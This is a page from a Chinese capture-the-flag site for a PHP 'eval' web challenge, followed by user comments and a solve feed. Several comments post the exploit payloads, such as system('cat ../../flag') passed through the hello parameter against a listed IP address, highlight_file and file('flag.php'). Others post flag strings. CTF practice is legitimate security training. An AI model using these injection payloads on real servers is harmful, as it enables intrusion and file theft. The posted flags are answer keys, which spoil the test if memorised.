evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 19966
提  示:
描  述:
eval
评论
453137 3年前

flag{71679b79e61face9debb4371063d114b}

回复 0

anguilin 3年前

http://114.67.175.224:18361/?hello=system(%27cat%20../../../../../../../../flag%27)简单

回复 1

acela 3年前

flag{932241d0a39e2c7a1fe31a9a7dd89594};

回复 0

wenroudeyanhuo 3年前

please input a?

回复 0

aoikuuun 3年前

/?hello=system("tail%20-n%202%20flag.php")

回复 0

GH0S7 3年前

我真棒

回复 0

K463726543 3年前

hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。

回复 1

SecI302 3年前

踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容

回复 0

Cat00011cat 3年前

http://114.67.175.224:10794/?hello=file(%27flag.php%27)

回复 1
musewithwind 3年前

@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了

回复 0

D4C 3年前

大佬能不能给小白讲讲原理啊

回复 0

小王爱吃螺蛳粉 3年前

有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来

回复 1

WriteUp

image
harry

1 金币

评分(12)

解题动态

Hogan 攻破了该题 1小时前
sorry123 攻破了该题 3小时前
xiaolili 攻破了该题 4小时前
ljjbit 攻破了该题 8小时前
墨尘 攻破了该题 9小时前
booku 攻破了该题 10小时前
15306829633 攻破了该题 11小时前
CHT 攻破了该题 11小时前
河马 攻破了该题 12小时前
Mr.Cyber 攻破了该题 13小时前
聪仔草莓51 攻破了该题 15小时前
pleonexia123 攻破了该题 15小时前
wsx68696 攻破了该题 1天前
lipingctf 攻破了该题 1天前
H1lla1n 攻破了该题 1天前
liyimanfan 攻破了该题 1天前
Yun1217 攻破了该题 2天前
你倒过来读看看呢 攻破了该题 2天前
jvfnvd.vl 攻破了该题 2天前
倚楼叹世间 攻破了该题 3天前
问题反馈